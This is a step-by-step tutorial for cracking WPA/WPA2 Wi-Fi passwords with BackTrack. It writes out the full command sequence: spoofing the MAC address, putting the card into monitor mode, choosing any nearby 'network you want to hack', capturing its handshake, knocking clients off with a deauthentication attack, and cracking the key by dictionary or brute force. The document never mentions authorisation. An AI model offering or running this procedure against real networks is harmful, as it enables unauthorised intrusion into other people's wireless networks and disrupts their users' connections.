Hacking WPA/WPA2 using BackTrack

***Note – Before you begin you must make sure that your wireless card supports packet injection otherwise this tutorial will not work
Step 1 – Boot into BackTrack 5
Step 2 – Open up a Terminal window which is a command line utility built into BackTrack 5. It is the Black Box on the top menu (if you’re using the Gnome version of Backtrack)






Step 3 – Enter the following commands into the command line

• airmon-ng stop wlan0
• ifconfig wlan0 down
• macchanger –mac 00:11:22:33:44:55 wlan0
• airmon-ng start wlan0

These commands stop the wireless interface so that you can change the MAC Address of your wireless card (in this case we are changing it to 00:11:22:33:44:55) and restarts the cards using the new MAC address

Step 4 – We will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us.

• airodump-ng mon0 

Step 5 – Choose the network you want to hack and take note of the BSSID, the Channel it is on as well as the ESSID.
*Note* – The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better.
Step 6 – Once you have chosen your target enter the following commands:

• airodump-ng mon0 –channel * –bssid **:**:**:**:**:** -w filename 

This will write capture packets and put them into the “filename” file. What we are trying to capture here is the handshake between the router and wireless connection which will give us the key we need to crack.
Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then proceed to Step 7 otherwise continue to Step 8.
Step 7 – Enter the command below to deauthorize a wireless connection and try to re-establish it so it will generate a new handshake to capture. This step ends once you have captured the handshake

• aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0 

Step 8 – Now we will try to crack the password in “filename.cap” using a list of words, here called “wordlist.lst” you can download a good 200 million word dictionary here

• aircrack-ng –w wordlist.lst -b **:**:**:**:**:** filename.cap 

Your computer has to compute the hash value of every password in that list but a computer can go through those 200 million passwords in 6-12 hours.
Step 9 - If the password isn’t found in the dictionary you can try and brute-force the password with this command: (Note this could take a very long time depending on their password strength).

• /pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b **:**:**:**:**:** -w – filename.cap